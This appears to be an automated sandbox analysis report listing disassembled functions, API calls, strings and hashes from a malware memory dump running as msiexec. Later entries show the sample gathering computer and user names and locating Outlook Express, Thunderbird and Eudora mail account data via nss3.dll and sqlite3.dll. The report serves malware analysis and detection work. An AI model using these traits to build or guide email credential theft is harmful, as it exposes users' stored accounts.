                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                              • memset.MSVCRT ref: 0042BAAE
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              APIs
                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040A908
                                                              • free.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: 9ee2b47597eab8627c31dfd54b85c52fe58fd1a50257b2b4a42ebb2a05ccea6e
                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                              • Opcode Fuzzy Hash: 9ee2b47597eab8627c31dfd54b85c52fe58fd1a50257b2b4a42ebb2a05ccea6e
                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • free.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: a2b8a7b7bc016de371920ce84c4526f0173927f4c1a81b7840355c423501a2a0
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: a2b8a7b7bc016de371920ce84c4526f0173927f4c1a81b7840355c423501a2a0
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              APIs
                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • free.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: eb405aabfd6e747a13101961e672a7388de2744f2c51c56a8eb0d610ae61b36d
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: eb405aabfd6e747a13101961e672a7388de2744f2c51c56a8eb0d610ae61b36d
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • free.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Control-flow Graph
                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 132 408484-408488 130->132 133 408455-40845e 130->133 134 408422-40842b 131->134 135 408460-408464 133->135 136 408465-408482 133->136 137 408432-40844e 134->137 138 40842d-408431 134->138 135->136 136->132 136->133 137->130 137->134 138->137
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                               Control-flow Graph
                                                               • Basic blocks of 407ef8-407f8f with their calls: 407ef8-407f01; 407f03-407f22 FindFirstFileA; 407f24-407f38 FindNextFileA; 407f3a call 407f90; 407f3f-407f44; 407f46-407f74 strlen * 2; 407f76-407f81 call 4070e3; 407f83; 407f86-407f88; 407f89-407f8f
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
                                                              • strlen.MSVCRT ref: 00407F64
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$`{g$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 3833278029-1827388529
                                                              • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
